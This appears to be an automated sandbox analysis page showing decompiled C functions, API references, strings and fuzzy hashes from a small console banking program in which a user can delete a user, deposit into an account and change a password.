Instruction ID: 64d4128de2348b85dd3d7b7c999f80c0e657b4951bdc922508a8a0c37687d239
Opcode Fuzzy Hash: 3a094f5da1e8ff8fa08ac76d95eb0bd046a2e9ab6f38127d66d378c874f09d90
Instruction Fuzzy Hash: 6EF1A7F2D10208ABDB15DFA4DC8AEDEB778AF15701F044655F60AB6050EB7066ACCF62

Uniqueness

Uniqueness Score: -1.00%

Function 00232C00, Relevance: 98.3, APIs: 42, Strings: 14, Instructions: 284
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E00232C00(void* __ecx, void* __fp0) {
				char _v5;
				intOrPtr _v12;
				char _v20;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v51;
				char _v52;
				char _v84;
				char _v116;
				char _v129;
				char _v139;
				char _v154;
				char _v188;
				struct _IO_FILE* _t58;
				int _t60;
				struct _IO_FILE* _t66;
				struct _IO_FILE* _t67;
				int _t68;
				struct _IO_FILE* _t70;
				struct _IO_FILE* _t73;
				int _t75;
				struct _IO_FILE* _t76;
				int _t86;
				int _t94;
				struct _IO_FILE* _t95;
				int _t98;
				char _t100;
				int _t113;
				int _t114;
				struct _IO_FILE* _t120;
				struct _IO_FILE* _t124;
				struct _IO_FILE* _t135;
				struct _IO_FILE* _t138;
				struct _IO_FILE* _t140;
				struct _IO_FILE* _t143;
				void* _t149;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t159;
				void* _t160;
				void* _t164;
				void* _t165;
				void* _t175;

				_t190 = __fp0;
				_v52 = 0;
				_v51 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v12 = 0;
				E002323F0(__ecx, __fp0);
				E00231000(0x19, 8);
				printf("User Name  : ");
				_push(0x23b244);
				scanf("%s");
				E00231000(0x19, 0xa);
				printf("Password  : ");
				E00231040( &_v52);
				strcpy(0x23b262,  &_v52);
				_t58 = fopen("USER.DAT", "r");
				_t154 = _t149 + 0x20;
				 *0x23b288 = _t58;
				while(1) {
					_t135 =  *0x23b288; // 0x0
					_t60 = fscanf(_t135, "%s %s %s\n", 0x23b240,  &_v84,  &_v116);
					_t155 = _t154 + 0x14;
					if(_t60 == 0xffffffff) {
						break;
					}
					strcpy( &_v84, _strupr( &_v84));
					strcpy( &_v116, _strupr( &_v116));
					strcpy(0x23b244, _strupr(0x23b244));
					strcpy(0x23b262, _strupr(0x23b262));
					_t113 = strcmp(0x23b244,  &_v84);
					_t154 = _t155 + 0x38;
					if(_t113 == 0) {
						_t114 = strcmp(0x23b262,  &_v116);
						_t154 = _t154 + 8;
						if(_t114 == 0) {
							_v12 = _v12 + 1;
						}
					}
				}
				_t120 =  *0x23b288; // 0x0
				fclose(_t120);
				_t156 = _t155 + 4;
				E002323F0(_t120, _t190);
				if(_v12 != 0) {
					E00231000(0xf, 0xa);
					printf("Are you sure you want to DELETE this user? <Y/N> : ");
					_t157 = _t156 + 4;
					if(_v5 == 0x59) {
						L10:
						 *0x23b288 = fopen("USER.DAT", "r");
						_t66 = fopen("temp.dat", "a");
						_t159 = _t157 + 0x10;
						 *0x23b280 = _t66;
						while(1) {
							_t67 =  *0x23b288; // 0x0
							_t68 = fscanf(_t67, "%s %s %s\n", 0x23b240,  &_v84,  &_v116);
							_t160 = _t159 + 0x14;
							if(_t68 == 0xffffffff) {
								break;
							}
							strcpy( &_v84, _strupr( &_v84));
							strcpy( &_v116, _strupr( &_v116));
							_t94 = strcmp(0x23b244,  &_v84);
							_t175 = _t160 + 0x20;
							if(_t94 != 0) {
								L14:
								_push( &_v116);
								_push( &_v84);
								_push(0x23b240);
								_t95 =  *0x23b280; // 0x0
								fprintf(_t95, "%s %s %s\n");
								_t159 = _t175 + 0x14;
								L16:
								continue;
							}
							_t98 = strcmp(0x23b262,  &_v116);
							_t175 = _t175 + 8;
							if(_t98 == 0) {
								strcpy( &_v20, 0x23b240);
								_t159 = _t175 + 8;
								goto L16;
							}
							goto L14;
						}
						_t138 =  *0x23b288; // 0x0
						fclose(_t138);
						_t70 =  *0x23b280; // 0x0
						fclose(_t70);
						 *0x23b288 = fopen("LOG.DAT", "r");
						_t73 = fopen("temp.dat", "w");
						_t164 = _t160 + 0x18;
						 *0x23b280 = _t73;
						while(1) {
							_t140 =  *0x23b288; // 0x0
							_t75 = fscanf(_t140, "%s %s %s %s",  &_v188,  &_v154,  &_v139,  &_v129);
							_t165 = _t164 + 0x18;
							if(_t75 == 0xffffffff) {
								break;
							}
							_strupr( &_v188);
							_strupr( &_v20);
							_t86 = strcmp( &_v188,  &_v20);
							_t164 = _t165 + 0x10;
							if(_t86 != 0) {
								_push( &_v129);
								_push( &_v139);
								_push( &_v154);
								_push( &_v188);
								_t143 =  *0x23b280; // 0x0
								fprintf(_t143, "%s %s %s %s\n");
								_t164 = _t164 + 0x18;
							}
						}
						_t76 =  *0x23b288; // 0x0
						fclose(_t76);
						_t124 =  *0x23b280; // 0x0
						fclose(_t124);
						E002323F0(_t124, _t190);
						E00231000(0x19, 0xa);
						return printf("Record DELETED successfully!");
					}
					_t100 = _v5;
					if(_t100 != 0x79) {
						return _t100;
					}
					goto L10;
				}
				E00231000(0xa, 0xa);
				return printf(0x239660);
			}

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00232C41
scanf.MSVCRT ref: 00232C54
printf.MSVCRT ref: 00232C6B

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

strcpy.MSVCRT(0023B262,00000000,00000000,?,?,?,?,?,?,?,?,00232875), ref: 00232C86
fopen.MSVCRT ref: 00232C98
fscanf.MSVCRT ref: 00232CBF
_strupr.MSVCRT ref: 00232CD5
strcpy.MSVCRT(?,00000000), ref: 00232CE3
_strupr.MSVCRT ref: 00232CEF
strcpy.MSVCRT(?,00000000), ref: 00232CFD
_strupr.MSVCRT ref: 00232D0A
strcpy.MSVCRT(0023B244,00000000), ref: 00232D19
_strupr.MSVCRT ref: 00232D26
strcpy.MSVCRT(0023B262,00000000), ref: 00232D35
strcmp.MSVCRT ref: 00232D46
strcmp.MSVCRT ref: 00232D5B
fclose.MSVCRT ref: 00232D7C
printf.MSVCRT ref: 00232D9E
printf.MSVCRT ref: 00232DBA
fopen.MSVCRT ref: 00232DE3
fopen.MSVCRT ref: 00232DFB
fscanf.MSVCRT ref: 00232E21
_strupr.MSVCRT ref: 00232E37
strcpy.MSVCRT(?,00000000), ref: 00232E45
_strupr.MSVCRT ref: 00232E51
strcpy.MSVCRT(?,00000000), ref: 00232E5F
strcmp.MSVCRT ref: 00232E70
strcmp.MSVCRT ref: 00232E85
fprintf.MSVCRT ref: 00232EA9
strcpy.MSVCRT(00000001,0023B240), ref: 00232EBD
fclose.MSVCRT ref: 00232ED1
fclose.MSVCRT ref: 00232EE0
fopen.MSVCRT ref: 00232EF3
fopen.MSVCRT ref: 00232F0B
fscanf.MSVCRT ref: 00232F3E
_strupr.MSVCRT ref: 00232F53
_strupr.MSVCRT ref: 00232F60
strcmp.MSVCRT ref: 00232F74
fprintf.MSVCRT ref: 00232FA5
fclose.MSVCRT ref: 00232FB9
fclose.MSVCRT ref: 00232FC9
printf.MSVCRT ref: 00232FE5

Strings

Are you sure you want to DELETE this user? <Y/N> : , xrefs: 00232DB5
LOG.DAT, xrefs: 00232EEE
Record DELETED successfully!, xrefs: 00232FE0
temp.dat, xrefs: 00232DF6
temp.dat, xrefs: 00232F06
%s %s %s %s, xrefs: 00232F32
Password : , xrefs: 00232C66
USER.DAT, xrefs: 00232C93
%s %s %s, xrefs: 00232E16
User Name : , xrefs: 00232C3C
%s %s %s, xrefs: 00232E9E
%s %s %s, xrefs: 00232CB3
%s %s %s %s, xrefs: 00232F99
USER.DAT, xrefs: 00232DDE

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$_struprstrcpy$strcmp$fclosefopen$fscanf$_strdatefprintf$ConsoleCursorHandlePositionisprintscanf
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s %s$%s %s %s %s$Are you sure you want to DELETE this user? <Y/N> : $LOG.DAT$Password : $Record DELETED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat$temp.dat
API String ID: 2784916429-4002591224
Opcode ID: fd53ddb62070a72b062d40fa81f925ee35198d8df0b3e0fb7cd2e32bda5a03f9
Instruction ID: 36dfe5b24c446c23323d8f975114f4bc8b4434344aac50e6d33049211d978b64
Opcode Fuzzy Hash: fd53ddb62070a72b062d40fa81f925ee35198d8df0b3e0fb7cd2e32bda5a03f9
Instruction Fuzzy Hash: 98A165F1D20304ABDB159FA4AC8AE9F7738BB12705F040619FA05A5191EBB1A57CCF62

Uniqueness

Uniqueness Score: -1.00%

Function 00234E40, Relevance: 93.1, APIs: 35, Strings: 18, Instructions: 326
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 59%

			E00234E40(void* __ecx, void* __fp0) {
				char _v5;
				char _v12;
				intOrPtr _v16;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v42;
				char _v62;
				char _v112;
				char _v113;
				char _v125;
				char _v140;
				char _v170;
				char _v200;
				char _v208;
				char _v244;
				char _v324;
				char _v360;
				char _v440;
				struct _IO_FILE* _t73;
				struct _IO_FILE* _t78;
				int _t79;
				struct _IO_FILE* _t80;
				char _t107;
				struct _IO_FILE* _t109;
				int _t114;
				struct _IO_FILE* _t115;
				struct _IO_FILE* _t119;
				int _t126;
				int _t134;
				struct _IO_FILE* _t157;
				struct _IO_FILE* _t158;
				struct _IO_FILE* _t181;
				struct _IO_FILE* _t186;
				void* _t190;
				void* _t195;
				void* _t196;
				void* _t197;
				void* _t208;
				void* _t210;
				void* _t211;
				void* _t220;

				_t230 = __fp0;
				_v16 = 0;
				E002323F0(__ecx, __fp0);
				E00231000(5, 0xa);
				printf("Deposit to A/C number            : ");
				_push( &_v28);
				scanf("%s");
				strcpy( &_v28, _strupr( &_v28));
				_t73 = fopen("ACCOUNT.DAT", "r");
				_t195 = _t190 + 0x20;
				 *0x23b288 = _t73;
				while(1) {
					_t78 =  *0x23b288; // 0x0
					_t79 = fscanf(_t78, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
					_t196 = _t195 + 0x38;
					if(_t79 == 0xffffffff) {
						break;
					}
					_t134 = strcmp( &_v28,  &_v208);
					_t195 = _t196 + 8;
					if(_t134 == 0) {
						_v16 = _v16 + 1;
						strcpy( &_v244,  &_v200);
						strcat( &_v244, " ");
						strcat( &_v244,  &_v170);
						_t195 = _t195 + 0x18;
					}
				}
				_t80 =  *0x23b288; // 0x0
				fclose(_t80);
				_t197 = _t196 + 4;
				if(_v16 == 0) {
					E002323F0( &_v200, _t230);
					E00231000(0x14, 0xc);
					return printf("Given A/C number does not exits!");
				}
				E00231000(0x32, 0xa);
				_push( &_v244);
				printf("[ %s ]");
				E00231000(5, 0xc);
				printf("Amount to be Deposited (in NRs.) : ");
				_push( &_v12);
				scanf("%f");
				E002323F0( &_v244, _t230);
				E00231000(0x1e, 0xa);
				printf("Confirm Transaction");
				asm("movss xmm0, [ebp-0x8]");
				asm("movss [esp], xmm0");
				E00231730( &_v360,  &_v360);
				E00231000(3, 0xc);
				_push( &_v244);
				printf("%s to be deposited in A/C number : %s [ %s ]");
				asm("cvtss2sd xmm0, [ebp-0x8]");
				asm("movsd [esp], xmm0");
				E00231A20( &_v440,  &_v360,  &_v28);
				strcpy( &_v324, "[In words : ");
				strcat( &_v324,  &_v440);
				strcat( &_v324, "]");
				E00231000(0x28 - (strlen( &_v324) >> 1), 0xe);
				puts( &_v324);
				E00231000(8, 0x11);
				printf("Are you sure you want to perform this tranasction? <Y/N>");
				_t208 = _t197 + 0x24 - 8 + 0x24;
				_t107 = _v5;
				if(_t107 == 0x59 || _v5 == 0x79) {
					 *0x23b288 = fopen("ACCOUNT.DAT", "r");
					_t109 = fopen("TEMP.DAT", "a");
					_t210 = _t208 + 0x10;
					 *0x23b284 = _t109;
					while(1) {
						_t181 =  *0x23b288; // 0x0
						_t114 = fscanf(_t181, "%s %s %s %s %s %s %c %s %c %f %f %f\n",  &_v208,  &_v200,  &_v170,  &_v125,  &_v112,  &_v62,  &_v113,  &_v140,  &_v42,  &_v40,  &_v36,  &_v32);
						_t211 = _t210 + 0x38;
						if(_t114 == 0xffffffff) {
							break;
						}
						_t126 = strcmp( &_v208,  &_v28);
						_t220 = _t211 + 8;
						if(_t126 == 0) {
							asm("movss xmm0, [ebp-0x24]");
							asm("addss xmm0, [ebp-0x8]");
							asm("movss [ebp-0x24], xmm0");
						}
						asm("movss xmm0, [ebp-0x24]");
						asm("addss xmm0, [ebp-0x20]");
						asm("movss [ebp-0x1c], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x1c]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x20]");
						asm("movsd [esp], xmm0");
						asm("cvtss2sd xmm0, [ebp-0x24]");
						asm("movsd [esp], xmm0");
						_push(_v42);
						_push( &_v140);
						_push(_v113);
						_push( &_v62);
						_push( &_v112);
						_push( &_v125);
						_push( &_v170);
						_push( &_v200);
						_push( &_v208);
						_t186 =  *0x23b284; // 0x0
						fprintf(_t186, "%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f\n");
						_t210 = _t220 - 0xfffffffffffffff8 + 0x44;
					}
					_t115 =  *0x23b284; // 0x0
					fclose(_t115);
					_t157 =  *0x23b288; // 0x0
					fclose(_t157);
					 *0x23b288 = fopen("TRANSACTION.DAT", "a");
					__imp___strtime(0x23b290);
					_push(0x23b244);
					asm("cvtss2sd xmm0, [ebp-0x8]");
					asm("movsd [esp], xmm0");
					_push(0x23b290);
					_push(0x23b2a0);
					_push("Cash+Deposited");
					_push( &_v28);
					_t119 =  *0x23b288; // 0x0
					fprintf(_t119, "%s %s %s %s %.2f %s\n");
					_t158 =  *0x23b288; // 0x0
					fclose(_t158);
					E002323F0(_t158, _t230);
					E00231000(0x14, 0xc);
					return printf("Transaction completed successfully!");
				}
				return _t107;
			}

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00234E63
scanf.MSVCRT ref: 00234E75
_strupr.MSVCRT ref: 00234E82
strcpy.MSVCRT(?,00000000), ref: 00234E90
fopen.MSVCRT ref: 00234EA2
fscanf.MSVCRT ref: 00234EF7
strcmp.MSVCRT ref: 00234F10
strcpy.MSVCRT(?,?), ref: 00234F33
strcat.MSVCRT(?,0023A534), ref: 00234F47
strcat.MSVCRT(?,?), ref: 00234F5D
fclose.MSVCRT ref: 00234F70
printf.MSVCRT ref: 00234F92
printf.MSVCRT ref: 00234FB5
printf.MSVCRT ref: 00234FCC
scanf.MSVCRT ref: 00234FDE
printf.MSVCRT ref: 00234FFA
printf.MSVCRT ref: 00235036
strcpy.MSVCRT(?,[In words : ), ref: 00235064
strcat.MSVCRT(?,?), ref: 0023507A
strcat.MSVCRT(?,0023A5E4), ref: 0023508E
strlen.MSVCRT ref: 0023509F
puts.MSVCRT ref: 002350BD
printf.MSVCRT ref: 002350D4
fopen.MSVCRT ref: 002350FD
fopen.MSVCRT ref: 00235115
fscanf.MSVCRT ref: 0023516B
strcmp.MSVCRT ref: 00235188
fprintf.MSVCRT ref: 00235217
fclose.MSVCRT ref: 0023522B
fclose.MSVCRT ref: 0023523B
fopen.MSVCRT ref: 0023524E
_strtime.MSVCRT ref: 00235261
fprintf.MSVCRT ref: 0023529A
fclose.MSVCRT ref: 002352AA

Part of subcall function 002323F0: printf.MSVCRT ref: 00232464

printf.MSVCRT ref: 002352C6

Strings

[ %s ], xrefs: 00234FB0
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 0023515F
Are you sure you want to perform this tranasction? <Y/N>, xrefs: 002350CF
%s to be deposited in A/C number : %s [ %s ], xrefs: 00235031
TRANSACTION.DAT, xrefs: 00235249
Given A/C number does not exits!, xrefs: 00234F8D
ACCOUNT.DAT, xrefs: 002350F8
TEMP.DAT, xrefs: 00235110
%s %s %s %s %s %s %c %s %c %f %f %f, xrefs: 00234EEC
Transaction completed successfully!, xrefs: 002352C1
%s %s %s %s %.2f %s, xrefs: 0023528F
Cash+Deposited, xrefs: 00235286
Deposit to A/C number : , xrefs: 00234E5E
Amount to be Deposited (in NRs.) : , xrefs: 00234FC7
Confirm Transaction, xrefs: 00234FF5
ACCOUNT.DAT, xrefs: 00234E9D
%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f, xrefs: 0023520B
[In words : , xrefs: 00235058

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$fclosefopenstrcat$strcmpstrcpy$_strdatefprintffscanfscanf$ConsoleCursorHandlePosition_strtime_struprputsstrlen
String ID: %s %s %s %s %.2f %s$%s %s %s %s %s %s %c %s %c %.2f %.2f %.2f$%s %s %s %s %s %s %c %s %c %f %f %f$%s %s %s %s %s %s %c %s %c %f %f %f$%s to be deposited in A/C number : %s [ %s ]$ACCOUNT.DAT$ACCOUNT.DAT$Amount to be Deposited (in NRs.) : $Are you sure you want to perform this tranasction? <Y/N>$Cash+Deposited$Confirm Transaction$Deposit to A/C number : $Given A/C number does not exits!$TEMP.DAT$TRANSACTION.DAT$Transaction completed successfully!$[ %s ]$[In words :
API String ID: 479242606-312053736
Opcode ID: 2bf3bf342d415fdc3bc1f27b516dfa0e31bfecb5a73d2078b8805ad073db69c8
Instruction ID: b7b12d0605f8f28d004f505d8d57f14cb8d2d9aa79cbd388176882ba1e5fc472
Opcode Fuzzy Hash: 2bf3bf342d415fdc3bc1f27b516dfa0e31bfecb5a73d2078b8805ad073db69c8
Instruction Fuzzy Hash: 2FC1B9F2D20308ABCB15DBA4EC4AFDE7738AF55701F044655F60AA5051EB7066ACCFA2

Uniqueness

Uniqueness Score: -1.00%

Function 00233000, Relevance: 93.0, APIs: 39, Strings: 14, Instructions: 298
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E00233000(void* __fp0) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v19;
				char _v23;
				char _v27;
				char _v31;
				char _v35;
				char _v39;
				char _v43;
				char _v47;
				char _v48;
				char _v51;
				char _v55;
				char _v59;
				char _v63;
				char _v67;
				char _v71;
				char _v75;
				char _v79;
				char _v80;
				char _v83;
				char _v87;
				char _v91;
				char _v95;
				char _v99;
				char _v103;
				char _v107;
				char _v111;
				char _v112;
				char _v144;
				char _v176;
				char _v208;
				struct _IO_FILE* _t76;
				int _t78;
				struct _IO_FILE* _t79;
				int _t83;
				int _t96;
				struct _IO_FILE* _t98;
				int _t100;
				struct _IO_FILE* _t101;
				int _t113;
				int _t116;
				int _t134;
				int _t135;
				struct _IO_FILE* _t138;
				struct _IO_FILE* _t142;
				struct _IO_FILE* _t152;
				struct _IO_FILE* _t154;
				struct _IO_FILE* _t156;
				void* _t164;
				void* _t169;
				void* _t170;
				void* _t171;
				void* _t172;
				void* _t178;
				void* _t179;
				void* _t187;

				_t202 = __fp0;
				_v48 = 0;
				_v47 = 0;
				_v43 = 0;
				_v39 = 0;
				_v35 = 0;
				_v31 = 0;
				_v27 = 0;
				_v23 = 0;
				_v19 = 0;
				_v80 = 0;
				_v79 = 0;
				_v75 = 0;
				_v71 = 0;
				_v67 = 0;
				_v63 = 0;
				_v59 = 0;
				_v55 = 0;
				_v51 = 0;
				_v112 = 0;
				_v111 = 0;
				_v107 = 0;
				_v103 = 0;
				_v99 = 0;
				_v95 = 0;
				_v91 = 0;
				_v87 = 0;
				_v83 = 0;
				_v16 = 0;
				_v12 = 0;
				E002323F0(0, __fp0);
				E00231000(0x19, 8);
				printf("User Name  : ");
				_push(0x23b244);
				scanf("%s");
				E00231000(0x19, 0xa);
				printf("Password  : ");
				E00231040( &_v80);
				strcpy(0x23b262,  &_v80);
				_t76 = fopen("USER.DAT", "r");
				_t169 = _t164 + 0x20;
				 *0x23b288 = _t76;
				while(1) {
					_t138 =  *0x23b288; // 0x0
					_t78 = fscanf(_t138, "%s %s %s\n", 0x23b240,  &_v176,  &_v144);
					_t170 = _t169 + 0x14;
					if(_t78 == 0xffffffff) {
						break;
					}
					strcpy( &_v176, _strupr( &_v176));
					strcpy( &_v144, _strupr( &_v144));
					strcpy(0x23b244, _strupr(0x23b244));
					strcpy(0x23b262, _strupr(0x23b262));
					_t134 = strcmp(0x23b244,  &_v176);
					_t169 = _t170 + 0x38;
					if(_t134 == 0) {
						_t135 = strcmp(0x23b262,  &_v144);
						_t169 = _t169 + 8;
						if(_t135 == 0) {
							_v16 = _v16 + 1;
						}
					}
				}
				_t79 =  *0x23b288; // 0x0
				fclose(_t79);
				_t171 = _t170 + 4;
				E002323F0(_t138, _t202);
				if(_v16 != 0) {
					E00231000(8, 0xa);
					_t83 = printf("Are you sure you want to CHANGE user name and/or password? <Y/N> : ");
					_t172 = _t171 + 4;
					_t139 = _v5;
					if(_v5 == 0x59 || _v5 == 0x79) {
						do {
							E002323F0(_t139, _t202);
							_v12 = 0;
							E00231000(0x19, 8);
							printf("NEW User Name        : ");
							_push( &_v208);
							scanf("%s");
							E00231000(0x19, 0xa);
							printf("NEW Password         : ");
							E00231040( &_v48);
							E00231000(0x19, 0xc);
							printf("Confirm NEW Password : ");
							E00231040( &_v112);
							_t139 =  &_v48;
							_t96 = strcmp( &_v48,  &_v112);
							_t172 = _t172 + 0x1c;
							if(_t96 != 0) {
								E002323F0( &_v48, _t202);
								E00231000(0xa, 0xa);
								printf(0x239874);
								_t172 = _t172 + 4;
								_v12 = _v12 + 1;
							}
						} while (_v12 != 0);
						 *0x23b288 = fopen("USER.DAT", 0x2398a4);
						_t98 = fopen("temp.dat", "a");
						_t178 = _t172 + 0x10;
						 *0x23b280 = _t98;
						while(1) {
							_t152 =  *0x23b288; // 0x0
							_t100 = fscanf(_t152, "%s %s %s\n", 0x23b240,  &_v176,  &_v144);
							_t179 = _t178 + 0x14;
							if(_t100 == 0xffffffff) {
								break;
							}
							strcpy( &_v176, _strupr( &_v176));
							strcpy( &_v144, _strupr( &_v144));
							_t113 = strcmp(0x23b244,  &_v176);
							_t187 = _t179 + 0x20;
							if(_t113 != 0) {
								L17:
								_push( &_v144);
								_push( &_v176);
								_push(0x23b240);
								_t154 =  *0x23b280; // 0x0
								fprintf(_t154, "%s %s %s\n");
								_t178 = _t187 + 0x14;
								L19:
								continue;
							}
							_t116 = strcmp(0x23b262,  &_v144);
							_t187 = _t187 + 8;
							if(_t116 == 0) {
								_push( &_v48);
								_push( &_v208);
								_push(0x23b240);
								_t156 =  *0x23b280; // 0x0
								fprintf(_t156, "%s %s %s\n");
								_t178 = _t187 + 0x14;
								goto L19;
							}
							goto L17;
						}
						_t101 =  *0x23b288; // 0x0
						fclose(_t101);
						_t142 =  *0x23b280; // 0x0
						fclose(_t142);
						E002323F0(_t142, _t202);
						E00231000(0x19, 0xa);
						return printf("Record has been EDITED successfully!");
					} else {
						return _t83;
					}
				}
				E00231000(0xa, 0xa);
				return printf(0x2397a4);
			}

APIs

Part of subcall function 002323F0: printf.MSVCRT ref: 0023240F
Part of subcall function 002323F0: strcmp.MSVCRT ref: 0023242B
Part of subcall function 002323F0: printf.MSVCRT ref: 0023244F
Part of subcall function 002323F0: printf.MSVCRT ref: 00232472
Part of subcall function 002323F0: _strdate.MSVCRT ref: 00232480
Part of subcall function 002323F0: printf.MSVCRT ref: 0023249D
Part of subcall function 002323F0: _strdate.MSVCRT ref: 002324AB
Part of subcall function 002323F0: printf.MSVCRT ref: 002324DF

Part of subcall function 00231000: GetStdHandle.KERNEL32(000000F5,00000000,?,002310E3,?,?,?,00237B25), ref: 00231021
Part of subcall function 00231000: SetConsoleCursorPosition.KERNEL32(00000000,?,002310E3,?,?,?,00237B25), ref: 00231028

printf.MSVCRT ref: 00233084
scanf.MSVCRT ref: 00233097
printf.MSVCRT ref: 002330AE

Part of subcall function 00231040: isprint.MSVCRT ref: 00231052
Part of subcall function 00231040: printf.MSVCRT ref: 0023107A

strcpy.MSVCRT(0023B262,00000000,00000000), ref: 002330C9
fopen.MSVCRT ref: 002330DB
fscanf.MSVCRT ref: 00233108
_strupr.MSVCRT ref: 00233121
strcpy.MSVCRT(?,00000000), ref: 00233132
_strupr.MSVCRT ref: 00233141
strcpy.MSVCRT(?,00000000), ref: 00233152
_strupr.MSVCRT ref: 0023315F
strcpy.MSVCRT(0023B244,00000000), ref: 0023316E
_strupr.MSVCRT ref: 0023317B
strcpy.MSVCRT(0023B262,00000000), ref: 0023318A
strcmp.MSVCRT ref: 0023319E
strcmp.MSVCRT ref: 002331B6
fclose.MSVCRT ref: 002331D6
printf.MSVCRT ref: 002331F8
printf.MSVCRT ref: 00233214
printf.MSVCRT ref: 0023324D
scanf.MSVCRT ref: 00233262
printf.MSVCRT ref: 00233279
printf.MSVCRT ref: 00233299
strcmp.MSVCRT ref: 002332B3
printf.MSVCRT ref: 002332D2
fopen.MSVCRT ref: 002332F8
fopen.MSVCRT ref: 00233310
fscanf.MSVCRT ref: 0023333D
_strupr.MSVCRT ref: 00233356
strcpy.MSVCRT(?,00000000), ref: 00233367
_strupr.MSVCRT ref: 00233376
strcpy.MSVCRT(?,00000000), ref: 00233387
strcmp.MSVCRT ref: 0023339B
strcmp.MSVCRT ref: 002333B3
fprintf.MSVCRT ref: 002333DE
fprintf.MSVCRT ref: 00233405
fclose.MSVCRT ref: 00233419
fclose.MSVCRT ref: 00233429
printf.MSVCRT ref: 00233445

Strings

%s %s %s, xrefs: 002333F9
USER.DAT, xrefs: 002332F3
Password : , xrefs: 002330A9
Are you sure you want to CHANGE user name and/or password? <Y/N> : , xrefs: 0023320F
User Name : , xrefs: 0023307F
temp.dat, xrefs: 0023330B
%s %s %s, xrefs: 002333D2
NEW Password : , xrefs: 00233274
NEW User Name : , xrefs: 00233248
USER.DAT, xrefs: 002330D6
%s %s %s, xrefs: 002330FC
Record has been EDITED successfully!, xrefs: 00233440
%s %s %s, xrefs: 00233331
Confirm NEW Password : , xrefs: 00233294

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: printf$strcpy$_struprstrcmp$fclosefopen$_strdatefprintffscanfscanf$ConsoleCursorHandlePositionisprint
String ID: %s %s %s$%s %s %s$%s %s %s$%s %s %s$Are you sure you want to CHANGE user name and/or password? <Y/N> : $Confirm NEW Password : $NEW Password : $NEW User Name : $Password : $Record has been EDITED successfully!$USER.DAT$USER.DAT$User Name : $temp.dat
API String ID: 690576788-371646773
Opcode ID: 24e82957ae7543871e0ee80c10266779971df5e7c739324ae156d41635bd0234
Instruction ID: e5a861bc55a87b3ca4f28b86631a14eabc00caa7068fe77a953a8c91f75b9a1e
Opcode Fuzzy Hash: 24e82957ae7543871e0ee80c10266779971df5e7c739324ae156d41635bd0234
Instruction Fuzzy Hash: 49B1C4F0E60304EFDB14DFA4EC4AF9E7674AF12701F048165FA09E6191EAB056788F66

Uniqueness

